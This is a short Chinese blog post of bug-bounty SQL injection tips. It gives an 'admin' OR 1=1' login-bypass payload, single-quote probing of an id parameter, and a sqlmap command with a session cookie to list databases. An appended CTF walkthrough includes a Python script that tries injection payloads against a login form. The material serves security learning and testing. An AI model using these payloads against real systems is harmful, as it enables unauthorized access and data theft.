赏金猎人笔记-sqli几个小技巧

最新推荐文章于 2025-07-30 21:14:09 发布
最新推荐文章于 2025-07-30 21:14:09 发布
阅读量157 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/richard1230/article/details/133043534
博客总结了几个信息技术相关技巧。一是通过google查找后台登陆界面,给出了有效率达60%的sqli的payload;二是针对不同情况提供了相应的SQL注入payload;三是对于位于需身份验证控制面板内的易受攻击目标,给出了尝试攻击的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

几个技巧小结

1.查找后台登陆界面: google: “www.target.com login”

有效率达到60%的一个sqli的payload:

2.sqli一个有效载荷: admin' OR 1=1- -'

3.对于类似这种: https://www.target/content/recapitulation.php?id=612
尝试 SQL 注入,使用的payload: (')

image

4.易受攻击的目标位于需要身份验证的控制面板内,可以使用:

Sqlmap -u “https://target.com/vulnerable/sqli/?id=1" -- cookie “you're cookie session”--dbs

1)始终尝试了解目标的每个参数和每个部分。
2)使用应用程序并尝试每个值和有效负载的孩子并检查结果。
3)永远不要失去希望,做你喜欢做的事情来忘记你的痛苦。

richard1230
关注
赏金猎人笔记-手动sqli
richard1230的博客
10-31 155
声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。 本文选自本人公众号: growing0101 发现漏洞 寻找有效SQLi的第一部分是发现漏洞。这里最重要的是知道你的输入在哪种类型的SQL上下文中。这里有一些基本的例子: 1. SELECT user_input FROM tournam...
学习笔记-SQLi
人饭子的博客
11-01 355
学习笔记-# SQLi 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 大纲 注入检测 MySQL MSSQL Oracle H2 database BigQuery SQLite 描述 注入攻击的本质,是程序把用户输入的数据当做代码执行。这里有两个关键条件,第一是用户能够控制输入;第二是用户输入的数据被拼接到要执行的代码...
学习笔记-Web Generic
人饭子的博客
11-02 1140
Web Generic 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 大纲 文件包含 日志中毒攻击 文件解析 IIS Nginx Apache 其他 文件上传 信息泄露 目录遍历 任意文件读取 源码泄露 GIT SVN bzr DS_Store文件泄漏 SWP文件泄露 网站备份压缩文件 WEB-...
2024版最新WEB安全入门指南(非常详细)零基础入门到精通,收藏这一篇就够了
Python_paipai的博客
07-26 1284
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…,你发现一个综合的项目涉及到方方面面,你各个方面可能都不太会,这时候你要对技能树进行梳理,哪些是需要舍去的,哪些是需要加固到最低要求的,哪些是自己主要方向需要不断强化的。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
开源攻防武器项目
Websec
07-08 4479
首先恭喜你发现了宝藏。本项目集成了全网优秀的开源攻防武器项目,包含信息收集工具(自动化利用工具、资产发现工具、目录扫描工具、子域名收集工具、指纹识别工具、端口扫描工具、各种插件....etc...),漏洞利用工具(各大CMS利用工具、中间件利用工具等项目........),内网渗透工具(隧道代理、密码提取.....)、应急响应工具、甲方运维工具、等其他安全攻防资料整理,供攻防双方使用。通用漏洞类:基础漏洞类:.........
Unity_RPG开发学习笔记
weixin_66484088的博客
07-28 1145
摘要 本教程指导如何在Unity 2021.3中创建3D RPG项目,包含以下核心内容:1)创建项目并安装Universal RP渲染管线提升画面表现;2)从Asset Store导入地图、角色和天空盒素材;3)关键工具操作:光照设置、阴影调整、顶点吸附等快捷键使用;4)安装PolyBrush、ProBuilder等场景构建工具。教程配有详细图文步骤和视频链接,特别说明不同Unity版本在URP材质转换时的差异处理方法。
JavaWeb(苍穹外卖)--学习笔记14
2301_81189772的博客
07-28 745
本文总结了JavaWeb开发中Controller层和数据库Mapper层的关键知识点。在Controller层,重点介绍了常用注解:@ResponseBody用于直接返回数据,@RestController组合注解,以及@GetMapping等请求方法注解。同时讲解了三种参数接收方式:简单参数(@RequestParam)、JSON参数(@RequestBody)和路径参数(@PathVariable)。在数据库Mapper层,通过菜品分类、菜品和口味的表结构示例,说明了逻辑外键的使用。最后展示了常见的S
单片机学习笔记.AD/DA(略含有SPI,用的是普中开发板上的XPT2046芯片)
2302_80302037的博客
07-30 99
8位1:单端008位1:单端00。
RK3568笔记九十三:基于RKNN Lite的YOLOv5目标检测
07-26 617
Yolov5是一种目标检测算法,属于单阶段目标检测方法,是在COCO数据集上预训练的物体检测架构和模型系列,它代表了Ultralytics对未来视觉AI方法的开源研究, 其中包含了经过数千小时的研究和开发而形成的经验教训和最佳实践。最新的YOLOv5 v7.0有YOLOv5n、YOLOv5s、YOLOv5m、YOLOv5l、YOLOv5x等,除了目标检测,还有分割,分类等应用场景。
《嵌入式C语言笔记(十五):字符串操作与多维指针深度解析》
weixin_72612809的博客
07-29 248
本文总结了C语言中字符串、指针和数组的重要操作与安全实践。主要内容包括:1.字符串操作推荐使用strn系列安全函数(如strncpy、strncat)替代危险函数;2.const关键字保护数据不被修改,void*指针需类型转换;3.区分数组指针和指针数组的用法;4.指针函数禁止返回局部变量地址,可用静态或全局变量;5.提供字符串基本操作函数实现和二维数组操作示例。关键技巧:使用const保护参数,注意指针生命周期管理,安全操作优先选择带长度限制的函数版本。这些实践对嵌入式开发等安全敏感场景尤为重要。
富士XT5 + XF23F1.4-WR使用笔记
kirioo的博客
07-30 76
使用了闪光灯+NC模式时曝光三要素的使用:当使用NC时要保证动态范围为400,所以ISO要设 置到500-620,再调快门速度使得匹配闪光灯速度,调整闪光灯功率到拍摄人物面部最佳,再调 整光圈大小提亮或虚化背景。白平衡调整:一般默认使用的是白色和自动,但是在人像拍摄时面目有时会偏黄,所以在人像摄影时使用色温模式,5300K。动态范围:NC模式下想把人物拍得通透一般设置为400,拍欧美分人文摄影这种更有质感得照片时用100/200更好。色彩曲线:H-2 S-1.5 使得高光和暗部的细节更加明显。
Python Day16 核心语法笔记整理 及 例题分析
ihghhfffv的博客
07-28 588
本文摘要: 多继承方法调用规则:super()遵循MRO顺序,显式调用需用类名.方法名 抽象类必须继承ABC,子类需实现所有抽象方法才能实例化 双向链表实现:包含头尾指针,支持增删查改和索引优化 对象数量限制:通过__new__控制最多创建5个实例 员工薪资系统:抽象类定义接口,子类实现不同薪资计算逻辑 角色对战游戏:包含技能、防御、复活等回合制机制 链表扩展功能:支持乘法、条件过滤等操作 责任链模式:按顺序尝试不同图片格式读取器
CTF-Web学习笔记:SQL注入篇
Deng7326的博客
07-28 980
本文系统梳理了CTF竞赛中SQL注入的核心原理与实战技巧。首先介绍了SQL注入的基础概念和成因,即用户输入数据被直接拼接到SQL语句中执行。其次分类解析了CTF常见的注入类型,包括数字/字符串型注入、报错/盲注/联合查询等攻击方式。文章重点分享了实战经验:如何判断注入点、确定数据库类型、使用工具辅助及绕过WAF防御。最后通过一道报错注入题目,详细演示了从数据库名获取到最终拿Flag的完整解题流程,并推荐了SQLiLabs等练习平台。
【学习笔记】Lean4 定理证明 ing
pushiqiang的博客
07-29 547
Lean证明是指在Lean环境中,通过编写代码来构造和验证数学定理的过程。Lean使用一种称为依赖类型理论的数学基础,这使得它能够表达复杂的数学概念,并确保证明的正确性。: Lean 所依据的依赖类型论对简单类型论的其中一项升级是,类型本身(如 Nat 和 Bool 这些东西)也是对象,因此也具有类型。简单地说,类型可以依赖于参数。你已经看到了一个很好的例子:类型List α 依赖于参数 α,而这种依赖性是区分 List Nat 和 List Bool 的关键。
sqli-labs通关笔记-第25a关GET数值型注入(过滤or和and 手注法)
mooyuan的网络安全博客
07-30 392
SQLI-LABS 是一个专门为学习和练习 SQL 注入技术而设计的开源靶场环境,本小节对第25a关Less 25a基于GET数值型的SQL注入关卡进行渗透实战,该关卡过滤关键字and和or防止SQL注入攻击,本关卡与25关的区别是闭合方式不同,本关卡为数值型注入,另外一个区别是本关卡不再打印数据库报错信息,故而无法使用报错法渗透。
9:java学习笔记:do-while语句
2301_76578848的博客
07-26 667
摘要:do-while循环与while循环结构相反,先执行循环体再判断条件(至少执行一次)。其语法为do{...}while(条件);,末尾分号不可省略。典型应用场景包括菜单交互(如游戏选项、学生系统),需确保首次必执行且持续验证输入。例如:用户输入正整数时,若值≤0则重复提示;菜单系统中,选项非退出码(如4)时循环显示。尽管使用频率低于其他循环,但在强制首次执行的场景中不可或缺。
VUE2 学习笔记10 组件
mashirokayo的博客
07-28 644
首先理解组件的思想在传统的前端开发中,一堆CSS、HTML、JS互相引用,会造成逻辑链条的混乱。考虑这样一种情况,对于不同的页面,需要同样的头部header和底部footer,这就导致,需要在不同的HTML页面中,会引入同样的CSS和JS,这样虽然没有很大的问题,但是会造成CSS、JS的依赖关系混乱,对于一个CSS,如果想分析这个CSS影响了多少页面,有时候是很难分析的,而且,如果修改了这个CSS,可能影响很多页面,有时候会造成很难理解的样式效果。如果JS之间存在依赖关系,依赖关系也是很难维护的。而且,对于
WhisperProcessor 语音转文字 使用笔记
jacke121的专栏
07-30 61
WhisperProcessor 语音转文字 使用笔记
数据库初阶笔记
最新发布
qq_62123793的博客
07-30 428
商业收费,功能强大,适用于数据极其重要、预算充足的大型企业提供完善的技术支持和服务,价格昂贵- 插入数据- 查询数据UPDATE- 修改数据- 删除数据注意:这四种操作有三种风格,不太科学的设定,接口风格不统一,使使用者学习成本增加。
ctf赛题my-first-sqli
01-19
### CTF SQL Injection Challenge "my-first-sqli": Walkthrough and Solution In the context of Capture The Flag (CTF) competitions, challenges like 'my-first-sqli' provide an opportunity to explore vulnerabilities within web applications through a controlled environment[^1]. This particular challenge focuses on exploiting Structured Query Language (SQL) injection flaws. The objective is typically to bypass authentication mechanisms by manipulating input fields that are not properly sanitized. For instance, consider a login form where users enter their username and password: ```html <form action="login.php" method="POST"> Username: <input type="text" name="username"><br> Password: <input type="password" name="password"><br> <input type="submit" value="Login"> </form> ``` A common approach involves injecting malicious code into these forms. An example payload might look as follows when targeting the `username` field with `' OR '1'='1` which always evaluates true regardless of what exists in the database table for usernames[^2]: #### Exploitation Process To exploit this vulnerability effectively while adhering to ethical guidelines set forth during such events, one would proceed cautiously using tools designed specifically for testing purposes only. Here’s how it could be done programmatically without causing harm or violating rules: ```python import requests url = "http://example.com/login" payloads = ["admin' --", "' OR '1'='1"] for p in payloads: response = requests.post(url, data={'username':p,'password':'anything'}) if "Welcome admin!" in response.text: print(f"[+] Successful exploitation with payload {p}") break else: print("[-] Failed to find working payload.") ``` This script sends POST requests containing crafted inputs aimed at uncovering potential weaknesses related to improper handling of user-supplied information before processing queries against backend databases[^3]. --related questions-- 1. What other types of attacks can occur due to poor validation practices? 2. How do modern frameworks prevent SQL injections from happening? 3. Are there any legal implications associated with participating in CTF exercises involving real-world targets? 4. Can you explain more about different methods used in securing web applications against various attack vectors?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值